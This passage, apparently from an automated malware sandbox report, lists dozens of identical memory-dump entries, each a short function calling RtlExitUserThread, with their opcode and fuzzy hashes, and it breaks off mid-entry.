                                                                                                            Function 05A50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05A50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761574032.0000000005A50000.00000040.00000001.sdmp, Offset: 05A50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00D00000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00D00023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759991483.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00C00000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00C00023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759945058.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05E10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05E10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762480516.0000000005E10000.00000040.00000001.sdmp, Offset: 05E10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05F10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05F10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762558073.0000000005F10000.00000040.00000001.sdmp, Offset: 05F10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05620000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05620023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761422671.0000000005620000.00000040.00000001.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 037C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 037C0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761122283.00000000037C0000.00000040.00000001.sdmp, Offset: 037C0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05A10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05A10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761564250.0000000005A10000.00000040.00000001.sdmp, Offset: 05A10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05B10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05B10023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761605227.0000000005B10000.00000040.00000001.sdmp, Offset: 05B10000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03490000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03490023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760927018.0000000003490000.00000040.00000001.sdmp, Offset: 03490000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 004E0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759516215.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06440000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06440023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763125944.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05B90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05B90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761626659.0000000005B90000.00000040.00000001.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 059D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 059D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761554595.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05C90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05C90023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761682717.0000000005C90000.00000040.00000001.sdmp, Offset: 05C90000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06150000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06150023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762827439.0000000006150000.00000040.00000001.sdmp, Offset: 06150000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01100000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01100023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760161856.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 010C0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760151799.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05170000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05170023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761234302.0000000005170000.00000040.00000001.sdmp, Offset: 05170000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B40000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00B40023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759898746.0000000000B40000.00000040.00000001.sdmp, Offset: 00B40000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 033D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 033D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760889686.00000000033D0000.00000040.00000001.sdmp, Offset: 033D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03700000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03700023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761044811.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05D50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05D50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761862187.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F40000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00F40023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760085408.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06380000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06380023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763081715.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 067E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 067E0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763313459.00000000067E0000.00000040.00000001.sdmp, Offset: 067E0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CC0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00CC0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759982660.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03740000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03740023
                                                                                                            Memory Dump Source
